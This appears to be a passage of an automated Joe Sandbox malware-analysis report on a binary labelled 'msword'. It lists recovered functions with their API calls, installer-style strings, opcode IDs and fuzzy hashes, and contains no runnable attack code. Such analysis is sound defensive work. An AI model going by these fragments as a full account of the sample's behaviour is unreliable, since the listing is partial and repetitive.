Source File: 0000000F.00000002.2027790046.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2027760605.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027814834.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2028104601.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
API String ID: 1033533793-945480824
Opcode ID: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
Opcode Fuzzy Hash: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D

Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71

WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2

Strings

Exec: failed createprocess ("%s"), xrefs: 004022C2
Exec: success ("%s"), xrefs: 00402263
Exec: command="%s", xrefs: 00402241

Memory Dump Source

Source File: 0000000F.00000002.2027790046.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2027760605.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027814834.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2028104601.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
API String ID: 2014279497-3433828417
Opcode ID: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
Opcode Fuzzy Hash: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D

Function 0040484E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
GetMessagePos.USER32 ref: 00404871
ScreenToClient.USER32(?,?), ref: 00404889
SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1

Strings

f, xrefs: 0040489D

Memory Dump Source

Source File: 0000000F.00000002.2027790046.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2027760605.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027814834.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2028104601.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5

Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
MulDiv.KERNEL32(00015600,00000064,?), ref: 00403295
wsprintfW.USER32 ref: 004032A5
SetWindowTextW.USER32(?,?), ref: 004032B5
SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7

Strings

verifying installer: %d%%, xrefs: 0040329F

Memory Dump Source

Source File: 0000000F.00000002.2027790046.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2027760605.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027814834.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2028104601.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58

Function 004043AD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 73stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
wsprintfW.USER32 ref: 00404457
SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A

Strings

%u.%u%s%s, xrefs: 00404444
@rD, xrefs: 00404402

Memory Dump Source

Source File: 0000000F.00000002.2027790046.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2027760605.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027814834.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2028104601.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$@rD
API String ID: 3540041739-1813061909
Opcode ID: 62d1a696c90b95282af5dc14f7046faf50b68b39d5c561db380251ecdb666397
Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
Opcode Fuzzy Hash: 62d1a696c90b95282af5dc14f7046faf50b68b39d5c561db380251ecdb666397
Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679

Function 00406038 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
CharNextW.USER32(?,?,?,00000000), ref: 004060AA
CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3

Strings

*?|<>/":, xrefs: 0040608A

Memory Dump Source

Source File: 0000000F.00000002.2027790046.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2027760605.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027814834.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2028104601.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD

Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
RegCloseKey.ADVAPI32(?), ref: 00401504
RegCloseKey.ADVAPI32(?), ref: 00401529
RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547

Memory Dump Source

Source File: 0000000F.00000002.2027790046.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2027760605.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027814834.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2028104601.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29

Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 004020A3
GetClientRect.USER32(00000000,?), ref: 004020B0
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
DeleteObject.GDI32(00000000), ref: 004020EE

Memory Dump Source

Source File: 0000000F.00000002.2027790046.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2027760605.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027814834.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2028104601.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
Opcode Fuzzy Hash: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28

Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE

Strings

!, xrefs: 00401FB6

Memory Dump Source

Source File: 0000000F.00000002.2027790046.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2027760605.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027814834.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2028104601.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758

Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B

RegCloseKey.ADVAPI32(00000000), ref: 0040282E
RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

DeleteRegKey: "%s\%s", xrefs: 00402843
DeleteRegValue: "%s\%s" "%s", xrefs: 00402820

Memory Dump Source

Source File: 0000000F.00000002.2027790046.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2027760605.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027814834.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2028104601.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: CloseDeleteOpenValuelstrlenwvsprintf
String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
API String ID: 1697273262-1764544995
Opcode ID: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
Opcode Fuzzy Hash: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D

Function 004048CC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00404902
CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970

Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1

Strings

@rD, xrefs: 00404934
, xrefs: 004048DA

Memory Dump Source

Source File: 0000000F.00000002.2027790046.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2027760605.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027814834.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2028104601.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID: $@rD
API String ID: 3748168415-881980237
Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD

Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC

lstrlenW.KERNEL32 ref: 004026B4
lstrlenW.KERNEL32(00000000), ref: 004026C1
SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC

Strings

CopyFiles "%s"->"%s", xrefs: 0040267F

Memory Dump Source

Source File: 0000000F.00000002.2027790046.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2027760605.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027814834.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.000000000048F000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B3000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004B7000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2027839713.00000000004BF000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.2028104601.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
String ID: CopyFiles "%s"->"%s"
API String ID: 2577523808-3778932970
Opcode ID: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
